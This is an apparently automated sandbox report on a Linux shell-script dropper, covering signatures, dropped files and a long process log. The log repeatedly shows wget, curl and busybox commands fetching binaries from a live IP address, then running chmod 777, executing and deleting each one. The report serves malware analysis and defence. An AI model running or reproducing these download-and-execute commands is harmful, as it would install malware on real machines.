Malware Analysis Report

2024-12-07 16:36

Sample ID 241114-c67lrstdjj
Target 7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
SHA256 7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918

Threat Level: Shows suspicious behavior

The file 7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 02:42

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 02:42

Reported

2024-11-14 02:44

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

32s

Max time network

128s

Command Line

[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m N/A
N/A /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J N/A
N/A /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O N/A
N/A /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB N/A
N/A /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O N/A
N/A /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz N/A
N/A /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE N/A
N/A /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx N/A
N/A /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 N/A
N/A /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC N/A
N/A /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ N/A
N/A /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q N/A
N/A /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 N/A
N/A /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 N/A
N/A /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC N/A
N/A /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ N/A
N/A /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q N/A
N/A /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 N/A
N/A /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 N/A
N/A /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m N/A
N/A /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J N/A
N/A /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O N/A
N/A /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB N/A
N/A /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 N/A
N/A /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O N/A
N/A /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz N/A
N/A /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE N/A
N/A /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /usr/bin/curl N/A
File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /usr/bin/curl N/A
File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /usr/bin/curl N/A
File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /usr/bin/curl N/A
File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /usr/bin/curl N/A
File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /usr/bin/curl N/A
File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /usr/bin/curl N/A
File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /usr/bin/curl N/A
File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /usr/bin/curl N/A
File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /usr/bin/curl N/A
File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /usr/bin/curl N/A
File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /usr/bin/curl N/A
File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /usr/bin/curl N/A
File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /usr/bin/curl N/A
File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /usr/bin/curl N/A
File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /usr/bin/curl N/A
File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /usr/bin/curl N/A
File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /usr/bin/curl N/A
File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /usr/bin/curl N/A
File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /usr/bin/curl N/A
File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /usr/bin/curl N/A
File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /usr/bin/curl N/A
File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /usr/bin/curl N/A
File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /usr/bin/curl N/A
File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /usr/bin/curl N/A
File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /usr/bin/curl N/A
File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /usr/bin/curl N/A
File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /usr/bin/curl N/A

Processes

/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh

[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/chmod

[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/rm

[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/wget

[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/chmod

[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J

[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/rm

[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/wget

[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/chmod

[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O

[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/rm

[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/wget

[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/chmod

[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB

[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/rm

[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/wget

[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/chmod

[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O

[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/rm

[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/wget

[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/chmod

[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz

[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/rm

[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/wget

[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/chmod

[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE

[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/rm

[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/wget

[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/chmod

[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx

[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/rm

[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/wget

[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/chmod

[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4

[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/rm

[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/wget

[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/chmod

[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC

[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/rm

[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/chmod

[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ

[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/rm

[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/chmod

[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q

[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/rm

[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/wget

[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/chmod

[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0

[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/rm

[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/wget

[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/chmod

[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0

[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/rm

[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/wget

[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/chmod

[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC

[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/rm

[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/chmod

[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ

[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/rm

[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/chmod

[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q

[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/rm

[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/wget

[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/chmod

[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0

[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/rm

[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/wget

[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/chmod

[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0

[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/rm

[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/wget

[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/chmod

[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/rm

[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/wget

[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/chmod

[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J

[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/rm

[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/wget

[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/chmod

[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O

[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/rm

[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/wget

[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/chmod

[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB

[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/rm

[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/wget

[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/chmod

[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4

[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/rm

[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/wget

[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/chmod

[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O

[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/rm

[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/wget

[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/chmod

[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz

[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/rm

[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/wget

[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/chmod

[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE

[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/rm

[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/wget

